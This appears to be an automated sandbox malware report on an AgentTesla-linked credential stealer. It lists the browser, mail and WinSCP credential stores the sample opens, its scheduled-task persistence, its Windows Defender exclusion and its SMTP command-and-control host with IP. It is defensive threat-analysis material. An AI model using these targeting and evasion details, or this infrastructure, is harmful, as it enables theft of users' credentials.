                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Users\user\AppData\Roaming\TuZRpLi.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Users\user\AppData\Roaming\TuZRpLi.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 6604, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: TuZRpLi.exe PID: 7400, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 6604, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: TuZRpLi.exe PID: 7400, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 6604, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: TuZRpLi.exe PID: 7400, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID: 1427139; Sample: SecuriteInfo.com.Win32.PWSX...; Startdate: 17/04/2024; Architecture: WINDOWS; Score: 100)
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
Contacted host: mail.thelamalab.com

SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe (started)
  dropped: C:\Users\user\AppData\Roaming\TuZRpLi.exe (PE32)
  dropped: C:\Users\user\AppData\Local\...\tmp8319.tmp (XML)
  signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
  -> SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe (started)
       network: mail.thelamalab.com 162.222.226.100, 49704, 49705, 587, PUBLIC-DOMAIN-REGISTRYUS, United States
  -> powershell.exe (started)
       signature: Loading BitLocker PowerShell Module
       -> conhost.exe (started)
       -> WmiPrvSE.exe (started)
  -> powershell.exe (started)
       -> conhost.exe (started)
  -> 2 other processes
       -> conhost.exe (started)

TuZRpLi.exe (started)
  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  -> TuZRpLi.exe (started)
       signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
  -> schtasks.exe (started)
       -> conhost.exe (started)
  -> TuZRpLi.exe (started)
  -> 2 other processes

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | 18% | ReversingLabs | Win32.Trojan.Generic
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | 30% | Virustotal |
SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\TuZRpLi.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\TuZRpLi.exe | 18% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\TuZRpLi.exe | 30% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
mail.thelamalab.com | 0% | Virustotal |

Source | Detection | Scanner | Label
http://mail.thelamalab.com | 0% | Virustotal |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.thelamalab.com | 162.222.226.100 | true | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.thelamalab.com | SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://account.dyn.com/ | SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 0000000A.00000002.2050510414.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.222.226.100 | mail.thelamalab.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1427139
Start date and time: 2024-04-17 04:37:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@27/15@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 160
• Number of non-executed functions: 12
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:37:55 | API Interceptor | 20x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe modified
04:37:57 | Task Scheduler | Run new task: TuZRpLi path: C:\Users\user\AppData\Roaming\TuZRpLi.exe
04:37:57 | API Interceptor | 31x Sleep call for process: powershell.exe modified
04:37:59 | API Interceptor | 15x Sleep call for process: TuZRpLi.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.222.226.100 | SHIPPING ORDER.exe | malicious | AgentTesla |
| receipt-73633T36X90N.exe | malicious | AgentTesla |
| AQQ-T7630-CVE8.exe | malicious | AgentTesla |
| SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exe | malicious | AgentTesla |
| SCAN_INCORRECT_DETAILS.exe | malicious | AgentTesla |
| SecuriteInfo.com.Heur.26171.30744.exe | malicious | AgentTesla |
| INVOICE_FEB-888201-2024.exe | malicious | AgentTesla |
| INVOICE_FEB-888201-2024.exe | malicious | AgentTesla |
| PURCHASE ORDER.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
mail.thelamalab.com | SHIPPING ORDER.exe | malicious | AgentTesla | 162.222.226.100
| receipt-73633T36X90N.exe | malicious | AgentTesla | 162.222.226.100
| AQQ-T7630-CVE8.exe | malicious | AgentTesla | 162.222.226.100
| SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exe | malicious | AgentTesla | 162.222.226.100
| SCAN_INCORRECT_DETAILS.exe | malicious | AgentTesla | 162.222.226.100
| SecuriteInfo.com.Heur.26171.30744.exe | malicious | AgentTesla | 162.222.226.100
| INVOICE_FEB-888201-2024.exe | malicious | AgentTesla | 162.222.226.100
| INVOICE_FEB-888201-2024.exe | malicious | AgentTesla | 162.222.226.100
| PURCHASE ORDER.exe | malicious | AgentTesla | 162.222.226.100

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PUBLIC-DOMAIN-REGISTRYUS | Fsd5TmAZfy.exe | malicious | AgentTesla | 208.91.198.143
| SHIPPING ORDER.exe | malicious | AgentTesla | 162.222.226.100
